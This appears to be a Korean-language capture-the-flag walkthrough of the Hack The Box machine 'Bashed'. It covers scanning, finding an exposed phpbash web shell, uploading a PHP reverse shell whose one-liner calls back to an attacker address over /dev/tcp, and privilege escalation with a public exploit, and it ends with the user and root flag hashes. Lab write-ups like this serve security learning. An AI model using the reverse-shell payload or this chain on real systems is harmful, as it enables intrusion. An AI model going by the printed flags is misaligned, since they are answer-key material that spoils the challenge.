[HTB] Bashed Writeup

포트 스캐닝을 통해 대상 머신에 대한 정보를 수집해보자.

nmap -sC -sS -sV -O -p- 10.129.171.147

 

80포트만 열려있어서 접속해보니 아래와같은 페이지가 나타났다.

 

서버 버전 정보는 아래와 같았고,

phpbash라는것에 대한 소개 외 별 기능이 없는거 같아 dirb를 활용해서 탐색해보았다.

dirb http://10.129.172.10

/dev 경로가 흥미로워서 접속해보니 phpbash.php 라는 파일이 있었고,

phpbash.php 기능 자체가 쉘을 제공하는것이다보니 user.txt 를 쉽게 얻을 수 있었다.

하지만 root 계정 권한이 아니었기 때문에 권한 상승 작업이 필요했다.

위 OS 버전에 따른 권한 상승을 시도해봤다. 여러 exploit 코드 중 44298.c(searchsploit) 을 활용하기로 했다.

다만, 현재 쉘은 온전치않기때문에 php reverse shellcode를 업로드하여 reverseshell을 획득한 후 진행하기로 했다.

아래 코드로 rs.php를 만들고, phpbash에서 wget명령어를 통해 /var/www/html/uploads/ 에 해당 코드 업로드 후 실행시켰다.

<?php exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.4/1234 0>&1'"); ?>

 

 

sudo -l

www-data계정에서 exploit 코드 실행이 가능한 사용자로 전환하기 위해 위 명령어를 통해 scriptmanager 계정에 접근 가능함을 확인했고

 

sudo -i -u scriptmanager

명령어를 통해 scriptmanager 로 전환, exploit 코드를 실행시켜 루트권한을 획득 할 수 있었다.

 

 

FLAG = 

[user] 2c281f318555dbc1b856957c7147bfc1

[root] cc4f0afe3a1026d402ba10329674a8e2